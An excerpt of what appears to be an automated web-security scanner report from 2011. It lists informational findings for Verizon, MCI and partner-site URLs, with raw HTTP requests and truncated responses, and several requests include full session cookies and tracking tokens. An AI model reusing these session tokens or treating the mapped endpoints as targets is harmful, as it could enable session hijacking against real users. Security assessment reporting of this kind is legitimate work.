GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Vary: accept-encoding
Cache-Control: private, max-age=21804
Date: Mon, 05 Sep 2011 22:26:21 GMT
Content-Length: 2270
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Verizo
...[SNIP]...

23.15. https://enterpriseportalcontent.mci.com/CC/public/Login/en-US/Enroll.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterpriseportalcontent.mci.com
Path:	/CC/public/Login/en-US/Enroll.htm

Request

GET /CC/public/Login/en-US/Enroll.htm HTTP/1.1
Host: enterpriseportalcontent.mci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Date: Mon, 05 Sep 2011 22:35:25 GMT
Content-Length: 7369
Connection: close
Cache-Control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title id="PageTitle">Verizon Enterprise Center</title>
       <meta content="M
...[SNIP]...

23.16. https://seal.verisign.com/getseal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://seal.verisign.com
Path:	/getseal

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 22:35:39 GMT
Connection: close

23.17. https://secure.opinionlab.com/ccc01/comment_card.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card.asp

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7518
Content-Type: text/html; Charset=UTF-8
Cool02: Opinionlab - Cool02
Date: Mon, 05 Sep 2011 22:35:39 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...

23.18. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card_json_4_0_b.asp

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.19. https://secure.opinionlab.com/rate36_json.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/rate36_json.asp

Request

GET /rate36_json.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

23.20. https://secure.opinionlab.com/rate36s.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/rate36s.asp

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

23.21. https://signin.verizon.com/sso/ForgotPassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/ForgotPassword

Request

GET /sso/ForgotPassword HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:48 GMT
Server: Apache
Content-Length: 0
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html

23.22. https://signin.verizon.com/sso/ForgotUserIdAndPwd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/ForgotUserIdAndPwd

Request

GET /sso/ForgotUserIdAndPwd HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.23. https://signin.verizon.com/sso/ResetAccount previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/ResetAccount

Request

GET /sso/ResetAccount HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:47 GMT
Server: Apache
Content-Length: 0
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html

23.24. https://signin.verizon.com/sso/RetrieveUserID previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/RetrieveUserID

Request

GET /sso/RetrieveUserID HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.25. https://signin.verizon.com/sso/forgotFlows/locateBAN.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/forgotFlows/locateBAN.jsp

Request

GET /sso/forgotFlows/locateBAN.jsp HTTP/1.1
Host: signin.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; VZSSOCOM_SESSIONID=3G0bTlLf1jTwG4vn19Q6hKvqw4QjypJ4qhDWfmfDPR62TbVp8RjL!419329926!559599265; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:23:29 GMT
Server: Apache
Content-Length: 11472
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Locate Your Verizon Account Number</title>

</head>

<body class="border">
<table border="0" width="100%" id="table1" height="79">
<tr>
<td style="padding-top: 10px; padding-le
...[SNIP]...

23.26. https://www.bbb.org/online/consumer/cks.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bbb.org
Path:	/online/consumer/cks.aspx

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.27. https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.whitefence.com
Path:	/WebObjects/WhiteFence.woa/wa/login

Request

GET /WebObjects/WhiteFence.woa/wa/login HTTP/1.1
Host: www.whitefence.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.28. https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.whitefence.com
Path:	/WebObjects/WhiteFenceService.woa/wa/forgotPassword

Request

Response

23.29. https://www22.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/

Request

Response

23.30. https://www22.verizon.com/ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx

Request

POST /ForYourHome/VzRepair/VzIHA/TealeafTarget.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
Content-Length: 900
X-TeaLeaf-Page-Objects: 0
Origin: https://www22.verizon.com
X-TeaLeaf-Page-Img-Fail: 0
X-TeaLeaf-Page-Render: 19471
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /ForYourHome/VZRepair/vziha/Service.aspx
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

<ClientEventSet PostTimeStamp="1315279530416" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID22H24M40S942R0.9401596281677485" TimeDuration="19471" DateSince1970="1315279500413" >
...[SNIP]...

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 237
Date: Mon, 05 Sep 2011 22:26:23 GMT
Connection: keep-alive
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><title="TealeafTarget.aspx"></title></head>
<body>
<hr>Re
...[SNIP]...

23.31. https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/content/verizonglobalhome/res_signin.aspx

Request

GET /content/verizonglobalhome/res_signin.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15256
Cache-Control: private, max-age=1800
Date: Mon, 05 Sep 2011 22:19:45 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html >
<head >
<title></title>

<link rel="stylesheet" type="text/c
...[SNIP]...

23.32. https://www22.verizon.com/includes/cache/15/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/15/blank.html

Request

Response

23.33. https://www22.verizon.com/includes/cache/getwb31.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/getwb31.asp

Request

GET /includes/cache/getwb31.asp?zip=10011 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 683
Content-Type: text/javascript
Expires: Mon, 05 Sep 2011 22:26:47 GMT
Cache-Control: Private
Date: Mon, 05 Sep 2011 22:21:47 GMT
Connection: keep-alive

rewriteHTML('scbwbnotice','');
rewriteHTML('scbwblinktext','New York, NY 10011');
rewriteHTML('scbwbicon','<a href=\'http://weather.weatherbug.com/NY/New York-weather.html?zcode=z6726&zi
...[SNIP]...

23.34. https://www22.verizon.com/includes/javascript/commonjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/commonjs/

Request

Response

23.35. https://www22.verizon.com/includes/javascript/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/oo_engine_c.js

Request

GET /includes/javascript/oo_engine_c.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:46 GMT
Content-Length: 29881
Connection: keep-alive

var OnlineOpinion=new Object();OnlineOpinion.util={SafeAddOnLoadEvent:function(func){if(!document.getElementById|!document.getElementsByTagName)return;var oldonload=window.onload;if(typeof window.
...[SNIP]...

23.36. https://www22.verizon.com/myverizon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/myverizon/

Request

GET /myverizon/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 